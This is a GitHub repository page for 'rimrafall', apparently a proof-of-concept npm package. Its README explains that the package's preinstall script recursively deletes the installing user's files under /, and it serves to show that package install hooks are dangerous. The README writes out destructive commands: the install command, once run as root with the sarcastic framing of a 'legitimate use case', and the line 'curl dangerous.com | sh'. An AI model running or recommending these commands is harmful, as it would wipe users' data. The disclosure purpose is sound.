Skip to content

joaojeronimo/rimrafall

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
README.md
README.md
 
 
index.js
index.js
 
 
package.json
package.json
 
 

Repository files navigation

rimrafall

This is to show that npm install can be as dangerous as curl dangerous.com | sh.

update, it's off the npm registry

It was taken off the npm registry but it solves nothing really, anyone could make malicious modules like this and mask it as a useful module that has a desired use case. Let's try to find ways to really make npm safe ;)

update 2, no intent of being malicious

No, I did not name this package rimrafall, submited it to HN, clearly stated what it does and clearly told people not to install it with the purpose of having people delete stuff on their computers.

Whatever you do, do not

npm install rimrafall

It has a preinstall script that will delete all the files and folders your current user owns, recursively, in /.

legitimate use case:

e.g., you need to completely incapacitate a machine (but please do heed the warning above):

sudo su -
npm install rimrafall

you might see lots of error messages like these:

rm: cannot remove `/sys/block/sda': Operation not permitted
rm: cannot remove `/sys/block/dm-0': Operation not permitted
rm: cannot remove `/sys/block/dm-1': Operation not permitted

which can safely be ignored.

About

npm install could be dangerous

www.kb.cert.org/vuls/id/319816

Topics

security node

Resources

Readme
Activity

Stars

165 stars

Watchers

2 watching

Forks

8 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 3

  •  
  •  
  •  

Languages